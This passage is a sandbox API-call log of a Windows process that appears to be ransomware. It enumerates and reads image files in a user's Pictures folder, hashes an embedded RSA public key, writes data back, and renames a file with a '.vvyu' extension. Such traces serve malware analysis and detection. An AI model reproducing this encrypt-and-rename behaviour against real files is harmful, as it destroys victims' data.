RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3530 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3590 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35a8 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3548 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3518 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0201.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8ffa8 | out: hHeap=0x620000) returned 1 [0201.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.783] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x18890, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x18890, lpOverlapped=0x0) returned 1 [0201.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.785] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x18895, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.785] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.786] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.787] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.787] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.787] CloseHandle (hObject=0x510) returned 1 [0201.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.789] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\BY rE6U_U.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\by re6u_u.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\BY rE6U_U.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\by re6u_u.png.vvyu")) returned 1 [0201.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.791] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0201.794] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85fc3180, ftCreationTime.dwHighDateTime=0x1d8a2fe, ftLastAccessTime.dwLowDateTime=0x13f85c60, ftLastAccessTime.dwHighDateTime=0x1d8a3c8, ftLastWriteTime.dwLowDateTime=0x13f85c60, ftLastWriteTime.dwHighDateTime=0x1d8a3c8, nFileSizeHigh=0x0, nFileSizeLow=0x13fac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="faTUjwnla.bmp", cAlternateFileName="FATUJW~1.BMP")) returned 1 [0201.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0201.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.795] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\faTUjwnla.bmp") returned=".bmp" [0201.795] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\faTUjwnla.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\fatujwnla.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.795] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=81836) returned 1 [0201.795] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.799] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x13f86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.799] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.801] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.802] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x13fac, lpOverlapped=0x0) returned 1 [0201.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.803] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.804] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.804] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.804] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.805] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.805] GetLastError () returned 0x0 [0201.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.805] GetLastError () returned 0x0 [0201.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.806] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.806] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.806] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.806] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.806] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x13fb0) returned 0x2ea99b0 [0201.808] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ffa8 [0201.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fff0 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.809] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0201.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0201.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3548 [0201.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3530 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.812] GetCurrentThreadId () returned 0x66c [0201.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8c58 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 